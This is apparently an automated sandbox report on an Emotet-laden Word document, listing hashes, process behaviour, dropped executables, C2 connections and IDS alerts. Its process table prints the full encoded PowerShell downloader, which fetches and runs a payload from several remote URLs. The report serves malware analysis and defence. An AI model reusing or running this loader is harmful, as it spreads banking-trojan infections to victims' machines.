analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

vir1.doc

Full analysis: https://app.any.run/tasks/0b99dc61-796d-4913-9f1b-c1b7c6d47b25
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 06:40:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Odio., Author: Lou Denis, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 23:29:00 2020, Last Saved Time/Date: Tue Sep 29 23:29:00 2020, Number of Pages: 1, Number of Words: 3749, Number of Characters: 21371, Security: 8
MD5:

7D23CB8063CCD89D7CE68FB639696051

SHA1:

EE908749853CC32C6C979463B0F875BB4CFB7EB2

SHA256:

F8B2D066F5A3D657EDB1544F9DF31A9A7B3121C5C14DDB1B96B50DDD69B44C22

SSDEEP:

1536:hMRD3bNqfNpu39IId5a6XP3Mg8af2qD9ieW0jnzJ:CR1qf69xak3Mgx2gVjnzJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • T36vmr9l.exe (PID: 3832)
      • KBDFO.exe (PID: 3152)
    • Connects to CnC server

      • KBDFO.exe (PID: 3152)
    • EMOTET was detected

      • KBDFO.exe (PID: 3152)
    • Changes the autorun value in the registry

      • KBDFO.exe (PID: 3152)
  • SUSPICIOUS

    • Creates files in the user directory

      • POwersheLL.exe (PID: 3632)
    • Executed via WMI

      • POwersheLL.exe (PID: 3632)
    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 3632)
      • T36vmr9l.exe (PID: 3832)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3632)
    • Reads Internet Cache Settings

      • KBDFO.exe (PID: 3152)
    • Starts itself from another location

      • T36vmr9l.exe (PID: 3832)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3968)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 25070
Paragraphs: 50
Lines: 178
Company: -
Security: Locked for annotations
Characters: 21371
Words: 3749
Pages: 1
ModifyDate: 2020:09:29 22:29:00
CreateDate: 2020:09:29 22:29:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Lou Denis
Subject: -
Title: Odio.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe t36vmr9l.exe #EMOTET kbdfo.exe

Process information

PID
CMD
Path
Indicators
Parent process
3968"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\vir1.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3632POwersheLL -ENCOD JABJAGIAYQB0AGQAbwBtAD0AKAAnAE0AYwAnACsAKAAnAHoAJwArACcAbgBpACcAKQArACcAcgA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdQBTAGUAUgBwAFIATwBGAGkATABFAFwAUwBzAEgATgBhAE0ASQBcAFUANwBfAEIAVQB5AGEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBDAFQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAFUAYABSAEkAVABZAHAAYABSAG8AYABUAGAATwBjAE8ATAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAnACkAKwAoACcALAAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxADEAJwArACcALAAgACcAKQArACcAdAAnACsAJwBsAHMAJwApADsAJABJAGEAegB1ADcANgBiACAAPQAgACgAKAAnAFQAJwArACcAMwA2AHYAJwApACsAKAAnAG0AJwArACcAcgA5ACcAKQArACcAbAAnACkAOwAkAFAAbAA0ADQAZwBzAHkAPQAoACgAJwBFACcAKwAnAGkANgAnACkAKwAoACcANQAnACsAJwB0AG0AJwApACsAJwBtACcAKQA7ACQAUQA3AHMAYwB6ADQAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBjAEoAJwArACgAJwB1ACcAKwAnAFMAcwBoAG4AYQBtACcAKQArACcAaQBjACcAKwAoACcASgB1AFUANwAnACsAJwBfAGIAJwArACcAdQB5AGEAJwApACsAKAAnAGMASgAnACsAJwB1ACcAKQApACAALQBDAFIARQBwAGwAYQBDAEUAIAAgACgAWwBjAGgAQQByAF0AOQA5ACsAWwBjAGgAQQByAF0ANwA0ACsAWwBjAGgAQQByAF0AMQAxADcAKQAsAFsAYwBoAEEAcgBdADkAMgApACsAJABJAGEAegB1ADcANgBiACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQASgA3ADkAeAA2AHkAbAA9ACgAKAAnAE0AawA0ACcAKwAnADUAcQAnACsAJwBoACcAKQArACcANgAnACkAOwAkAEIAZwBhAHkAbwB2AHIAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQBUAC4AVwBFAGIAQwBsAGkARQBOAHQAOwAkAFEAMQBlAGEAbgA5AGIAPQAoACgAJwBoACcAKwAnAHQAdABwACcAKQArACcAOgAnACsAJwAvAC8AJwArACgAJwB3AHcAdwAnACsAJwAuAHAAJwArACcAcgBvAGQAJwArACcAdQBjAHQAcwBvACcAKwAnAGYAaQBuACcAKQArACgAJwBkAGkAYQAnACsAJwByAGUAJwApACsAJwB2ACcAKwAnAGkAJwArACcAZQAnACsAKAAnAHcAcwAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAnACsAJwAvAGMAJwApACsAJwBzAHMAJwArACgAJwAvACcAKwAnADkAVQB0ACcAKQArACcALwAqACcAKwAoACcAaAB0ACcAKwAnAHQAcABzADoAJwApACsAKAAnAC8ALwBvACcAKwAnAG4AbABpACcAKQArACgAJwBuACcAKwAnAGUAMgAnACkAKwAoACcANABoAC4AYgAnACsAJwBpACcAKQArACgAJwB6ACcAKwAnAC8AdwBwAC0AJwApACsAKAAnAGEAZAAnACsAJwBtACcAKQArACgAJwBpACcAKwAnAG4ALwBuAC8AJwArACcAKgAnACsAJwBoAHQAdAAnACkAKwAnAHAAJwArACgAJwBzACcAKwAnADoALwAvACcAKQArACcAcwAnACsAJwB0ACcAKwAoACcAYQByAC0AJwArACcAcwBwACcAKwAnAGUAJwApACsAKAAnAGUAZAAuACcAKwAnAHYAaQBwACcAKQArACgAJwAvAHcAcAAtAGEAZAAnACsAJwBtACcAKQArACcAaQBuACcAKwAoACcALwBqACcAKwAnAHAAJwApACsAJwAvACoAJwArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwAHMAOgAvAC8AawAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAGgAdABoAGkAZQAnACsAJwB0AGsAZQAnACkAKwAnAC4AJwArACgAJwBjAG8AbQAvADAAJwArACcARgBnAC8AJwApACsAJwAqAGgAJwArACgAJwB0AHQAJwArACcAcABzADoAJwApACsAJwAvAC8AJwArACcAcwAnACsAKAAnAHkAbgAnACsAJwB0ACcAKQArACgAJwBlAGcAJwArACcAbwAnACkAKwAnAHcAJwArACgAJwBzAC4AYwBvACcAKwAnAG0ALwBjAGgAJwApACsAJwBpAHIAJwArACgAJwBhAGcAJwArACcALwAnACkAKwAnAEsAJwArACcAWAAvACcAKwAnACoAJwArACgAJwBoAHQAJwArACcAdABwACcAKwAnAHMAOgAvAC8AJwApACsAKAAnAHYAJwArACcAaQBzACcAKwAnAGgAYQBsAHAAJwApACsAKAAnAGEAdABvAGwAYQAnACsAJwAuAGMAbwBtACcAKwAnAC8AJwApACsAKAAnAHcAJwArACcAcAAtAGEAZABtAGkAJwArACcAbgAvADIALwAnACkAKwAoACcAKgBoAHQAdABwAHMAJwArACcAOgAnACsAJwAvAC8AJwApACsAJwBzAGgAJwArACgAJwBtACcAKwAnAGMAdAAuAG8AJwArACcAcgBnACcAKQArACcALwAnACsAJwB3ACcAKwAoACcAcAAtAGEAJwArACcAZAAnACkAKwAoACcAbQAnACsAJwBpAG4ALwAnACkAKwAoACcAWAAnACsAJwBtAC8AJwApACkALgAiAFMAcABgAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUwA3AHMAZAB0AGEAbAA9ACgAKAAnAEEAJwArACcAbwBjAGkAXwAnACsAJwB6ACcAKQArACcAaQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABKADUAaAB2AGQAdAA2ACAAaQBuACAAJABRADEAZQBhAG4AOQBiACkAewB0AHIAeQB7ACQAQgBnAGEAeQBvAHYAcgAuACIARABvAHcAYABOAGwAbwBgAEEAZABmAGkAYABsAGUAIgAoACQASgA1AGgAdgBkAHQANgAsACAAJABRADcAcwBjAHoANABpACkAOwAkAE4AcAAwAHYAXwB5ADQAPQAoACgAJwBaADIAJwArACcAbQAnACkAKwAnADgAMQAnACsAJwA2AHQAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAFEANwBzAGMAegA0AGkAKQAuACIATABFAE4ARwBgAFQAaAAiACAALQBnAGUAIAAzADkAMgAyADMAKQAgAHsAJgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAoACQAUQA3AHMAYwB6ADQAaQApADsAJABUAGUAeAA2AGoAeABuAD0AKAAnAEoAdwAnACsAKAAnAHIAdwBkACcAKwAnAGMANAAnACkAKQA7AGIAcgBlAGEAawA7ACQASgBrAGIAagBqAGQAYgA9ACgAKAAnAE8AJwArACcAZAAzACcAKQArACcAegBvACcAKwAnADYAaAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMANQBqAHYAdgB1AGsAPQAoACcAUAAnACsAKAAnAF8AdwAnACsAJwBjACcAKQArACgAJwBtAG0AJwArACcAOAAnACkAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3832"C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe" C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe
POwersheLL.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Exit code:
0
Version:
2.8.0.3
3152"C:\Users\admin\AppData\Local\systemcpl\KBDFO.exe"C:\Users\admin\AppData\Local\systemcpl\KBDFO.exe
T36vmr9l.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Version:
2.8.0.3
Total events
2 258
Read events
1 340
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
3968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBEDC.tmp.cvr
MD5:
SHA256:
3632POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TVEJ4FBOXIPBD2L3IRGY.temp
MD5:
SHA256:
3832T36vmr9l.exeC:\Users\admin\AppData\Local\Temp\~DF2F1F7AF9A7C5F030.TMP
MD5:
SHA256:
3968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\vir1.doc.LNKlnk
MD5:B46FA0AD741E5054150FC0012C91AD6B
SHA256:9080AE3B131215E88D3AE4E796B52E24D5BA3AE5602B513F1D73658181BDBEB0
3968WINWORD.EXEC:\Users\admin\Desktop\~$vir1.docpgc
MD5:AD0A0293B6BDCFE52E47A31D50476B72
SHA256:128C82676D7C2EB8AEAC8013448E8027260F4E25C8AFCB62E334E5D5497CFBFD
3832T36vmr9l.exeC:\Users\admin\AppData\Local\systemcpl\KBDFO.exeexecutable
MD5:6B150B90D11ECED71CCCC6FADEC39D43
SHA256:93B60CF27B25A6867C5F01CA9355335B8AC4ECC2260982A50714CD12C47A5D09
3968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:1998C7ECDE025FB74624480B97A70378
SHA256:13D34FE24069C286B32B8BE371334A48AC41738C8E1D06FEF2DFD88C3A63E466
3632POwersheLL.exeC:\Users\admin\Sshnami\U7_buya\T36vmr9l.exeexecutable
MD5:6B150B90D11ECED71CCCC6FADEC39D43
SHA256:93B60CF27B25A6867C5F01CA9355335B8AC4ECC2260982A50714CD12C47A5D09
3968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:7BC094E9C2435B309D9E12BE4843CADE
SHA256:A84E8C2C72D30FE1089DE35B13437C0771EA4BE856662EA8D15A1B0C63F61E3E
3968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:398DE326941A5E8BA1AEB90ACBF3AD12
SHA256:AC1D7DBA2E79145B861969922D7A785C40B5C31CDD08DE705DBC8FBA1AAC666B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3632
POwersheLL.exe
68.66.228.11:80
www.productsofindiareviews.com
A2 Hosting, Inc.
US
suspicious
3152
KBDFO.exe
202.22.141.45:80
OFFRATEL
NC
malicious

DNS requests

Domain
IP
Reputation
www.productsofindiareviews.com
  • 68.66.228.11
suspicious

Threats

PID
Process
Class
Message
3632
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3632
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3632
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3152
KBDFO.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M10
No debug info